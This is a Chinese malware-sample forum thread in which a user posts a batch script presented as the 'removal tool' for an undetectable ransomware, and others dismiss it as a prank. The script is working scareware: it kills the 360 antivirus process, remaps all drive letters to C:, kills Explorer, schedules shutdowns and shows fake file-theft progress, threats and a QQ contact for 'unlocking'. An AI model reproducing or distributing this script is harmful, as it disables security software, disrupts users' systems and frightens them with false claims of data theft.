这个勒锁病毒扫不出来！！！

显示全部楼层 · 发表于 2019-10-19 18:13:15

这个运行后后台下载病毒辅助工具（远程观看，远程关机，复制电脑文件并传输...）目前扫描显示无病毒，可以用虚拟机打开看看。

显示全部楼层 · 发表于 2019-10-19 18:23:20

另外这个病毒的解除程序会误报，如果中以上病毒使用这个解毒。

显示全部楼层 · 发表于 2019-10-19 18:27:47

@ color 1f

@echo off

title 傻逼，等死吧!

echo 你最好不要关掉这个程序，因为你关掉了还是会在后台运行，而且你不关掉你会看到解除方法！！！正在开启后台下载模式......!

echo 开启成功

ping 127.0.0.1 /n 4 >nul

echo.

echo 正在下载病毒程序......25%

echo.

ping 127.0.0.1 /n 4 >nul

echo 正在下载病毒程序......50%

echo.

echo 正在下载病毒程序......75%

ping 127.0.0.1 /n 4 >nul

echo 完成

echo.

echo 我已经下载了病毒隐藏在目录里，你是找不到的。

ping 127.0.0.1 /n 4 >nul

echo 正在打开“病毒we”......

echo.

echo 正在配制......

ping 127.0.0.1 /n 4 >nul

echo 正在复制电脑文件......

echo.

echo 正在复制电脑文件......25%

ping 127.0.0.1 /n 4 >nul

echo 正在复制电脑文件......75%

echo.

echo 正在复制电脑文件......77%

ping 127.0.0.1 /n 4 >nul

echo 正在复制电脑文件......90%

taskkill /f /im 360tray.exe

ping 127.0.0.1 /n 4 >nul

echo 正在复制电脑文件......100%

echo.

ping 127.0.0.1 /n 4 >nul

echo 正在执行命令......

echo.

ping 127.0.0.1 /n 4 >nul

@echo off

for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: C:\)

start explorer.exe

ping 127.0.0.1 /n 4 >nul

echo 完成

echo.

ping 127.0.0.1 /n 4 >nul

echo 给你两分钟时间，让你找找文件下载在哪了

echo .

ping 127.0.0.1 /n 120 >nul

echo 看过了吗

echo.

ping 127.0.0.1 /n 120 >nul

echo 正在执行倒计时......

echo.

@echo off

shutdown /s /t 120 /c "正在设置倒计时......"

ping 127.0.0.1 /n 15 >nul

shutdown -a

echo 成功，还剩5天盗取资料并解除此电脑使用权

ping 127.0.0.1 /n 4 >nul

echo 提醒你，不管你的电脑关机还是扫描，都扫不到我下载的程序，即使你把此程序删了。

echo.

echo 如果想解除加QQ：2753543919

ping 127.0.0.1 /n 4 >nul

echo 0.13

ping 127.0.0.1 /n 4 >nul

echo 0.25

ping 127.0.0.1 /n 4 >nul

echo 0.49

ping 127.0.0.1 /n 4 >nul

echo 0.69

ping 127.0.0.1 /n 4 >nul

echo 0.89

ping 127.0.0.1 /n 4 >nul

echo 0.99

ping 127.0.0.1 /n 4 >nul

echo loading

ping 127.0.0.1 /n 4 >nul

echo 我已经可以看到你的电脑主页了!

ping 127.0.0.1 /n 4 >nul

echo 你最好快点！

ping 127.0.0.1 /n 10 >nul

echo 正在测试关机指令......

taskkill /f /im explorer.exe

shutdown /s /t 30 /c "准备关机（来源病毒远控的操作）"

ping 127.0.0.1 /n 28 >nul

shutdown -a

echo 看来效果不错

for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)

start explorer.exe

ping 127.0.0.1 /n 4 >nul

echo 你最好快点

ping 127.0.0.1 /n 4 >nul

echo 不然你只到后果

ping 127.0.0.1 /n 4 >nul

echo 再会

ping 127.0.0.1 /n 4 >nul

echo

ping 127.0.0.1 /n 4 >nul

echo

ping 127.0.0.1 /n 4 >nul

echo

有点无聊

显示全部楼层 · 发表于 2019-10-19 18:50:03

本帖最后由 a233 于 2019-10-19 18:56 编辑

好无聊的东西，没可玩性

显示全部楼层 · 发表于 2019-10-19 19:33:08

我还真不知道，并且这是我朋友给我的。。。。。。

显示全部楼层 · 发表于 2019-10-19 19:45:24

这种小学生水平的也好意思拿出来

就一玩笑程序

不过2753543919这个QQ号真是作者的吗？
那个所谓的解除程序倒算得上是毒，但这是单线程的，效果不够好

显示全部楼层 · 发表于 2019-10-20 10:21:13

zay365 发表于 2019-10-19 19:45
这种小学生水平的也好意思拿出来
就一玩笑程序
不过2753543919这个QQ号真是作者的吗？

这个我也就打开过，并没有把他改成txt文档看，还以为是真的。。。

显示全部楼层 · 发表于 2019-10-20 11:26:19

杀不出来。大蜘蛛报安全。这个一般不会杀的。锁机样本对我没用，我是微软账户，原来中过。

显示全部楼层 · 发表于 2019-10-20 11:34:23

a8855942 发表于 2019-10-20 11:26
杀不出来。大蜘蛛报安全。这个一般不会杀的。锁机样本对我没用，我是微软账户，原来中过。

这根本就不是锁机，就是个小学生水平的恶搞脚本

显示全部楼层 · 发表于 2019-10-20 11:46:00

zay365 发表于 2019-10-20 11:34
这根本就不是锁机，就是个小学生水平的恶搞脚本

很多脚本CMD感觉杀毒软件都放行，还有一个占内存的CMD，到后面卡死。

[病毒样本] 这个勒锁病毒扫不出来！！！

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源